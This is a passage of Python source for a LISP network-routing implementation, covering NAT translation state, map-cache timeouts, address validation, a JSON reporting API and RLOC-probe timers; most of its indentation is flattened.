if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
    #
    # Note: this function is intentionally disabled by the early return
    # below; remove it to reactivate periodic Map-Resolver testing.
    #
    return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
last_refresh_time = mc.last_refresh_time
#
# If mapping system runs on this system, disregard packet activity.
# There could be a race condition for active sources, where destinations
# are not registered yet due to system restart. If the LISP subsystem
# is within 5 minutes of restarting, time out native-forward entries.
#
if (lisp_is_running("lisp-ms") and lisp_uptime + (5*60) >= now):
if (mc.action == LISP_NATIVE_FORWARD_ACTION):
last_refresh_time = 0
lprint("Remove startup-mode native-forward map-cache entry")
#endif
#endif
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
ut = lisp_print_elapsed(mc.uptime)
lrt = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint(("Map-cache entry {} {}, had uptime {}, last-refresh-time {}"). \
format(green(prefix_str, False), bold("timed out", False), ut, lrt))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
    # Now remove from the map-cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} dictionary is keyed by hostname, each entry
# holding an array of lisp_nat_info() values. We keep all the current and
# previous NAT state associated with the Info-Request hostname. This is so
# we can track how much movement is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (hostname not in lisp_nat_state_info):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
    # So this Info-Request does not refresh the youngest entry. See if it
    # matches an older entry. Either way we prepend the new state; if a
    # matching old entry exists, it is removed from the array first.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
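#
# For illustration, after an xTR named "jdoe-mac" has moved behind a new NAT,
# lisp_nat_state_info could look like this (youngest entry first, addresses
# and ports made up):
#
# lisp_nat_state_info = {
#     "jdoe-mac" : [ lisp_nat_info("24.4.1.1", "jdoe-mac", 31743),
#                    lisp_nat_info("67.44.8.9", "jdoe-mac", 16003) ]
# }
#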
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (hostname not in lisp_nat_state_info): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to, and install an
# ephemeral static route to force the Info-Request to go out a specific
# interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in list(lisp_map_resolvers_list.values()):
mr_list.append(mr.map_resolver)
#endfor
dest_list = mr_list
if (dest_list == []):
for ms in list(lisp_map_servers_list.values()):
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in list(lisp_map_resolvers_list.values()):
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating
# distinguished-name, IPv4, IPv6, MAC, geo-prefix, and E.164 formats.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
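#
# Illustrative inputs and results for this validator:
#
#   "'jdoe-printer'"        -> True   (distinguished-name)
#   "192.168.1.1"           -> True   (IPv4)
#   "fd00::1"               -> True   (IPv6)
#   "0050-56b3-9cbf"        -> True   (MAC)
#   "46-10-20-N-61-43-4-W"  -> True   (geo-prefix)
#   "+14085551212"          -> True   (E.164)
#   "1.2.3.4.5"             -> False  (too many dotted-decimal bytes)
#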
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the lisp-core process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
# Variable "data_structure" is a string and not a byte string. Caller converts.
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
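#
# Illustrative "data_structure" strings a caller might send, with the
# parameters portion encoded as JSON:
#
#   "map-cache%"
#   'map-cache%{"instance-id" : "0", "eid-prefix" : "10.0.0.0/8"}'
#   'map-server%{"dns-name" : "ms.example.com"}'
#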
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in list(rloc.multicast_rloc_probe_list.values()):
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
addr_str = None
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
addr_str = r["address"]
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
addr_str += ":" + r["encap-port"]
#endif
if (addr_str and addr_str in lisp_crypto_keys_by_rloc_encap):
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key != None and key.shared_key != None):
r["encap-crypto"] = "crypto-" + key.cipher_suite_string
#endif
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in list(site_cache.cache[ml].entries.values()):
if (se.accept_more_specifics == False): continue
if (se.site.site_name not in sites):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return configured map-server or map-resolver information to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if ("dns-name" in data) else None
if ("address" in data):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in list(lisp_map_servers_list.values()):
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (device in lisp_myinterfaces):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-device (or device if "dynamic-eid-device" is not
# configured) if the supplied EID matches a configured dynamic-EID in a
# "lisp interface" command. Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (device not in lisp_myinterfaces): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
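#
# threading.Timer() is one-shot, so periodic probing comes from the handler
# re-arming the timer as its first action, the way
# lisp_process_rloc_probe_timer() below calls this function at its top. A
# minimal standalone sketch of the idiom, with hypothetical names:
#
def lisp_example_start_periodic(interval, work):
    def handler():
        threading.Timer(interval, handler).start()
        work()
    #enddef
    handler()
    return
#enddef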
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probing
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in list(lisp_rloc_probe_list.values()):
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
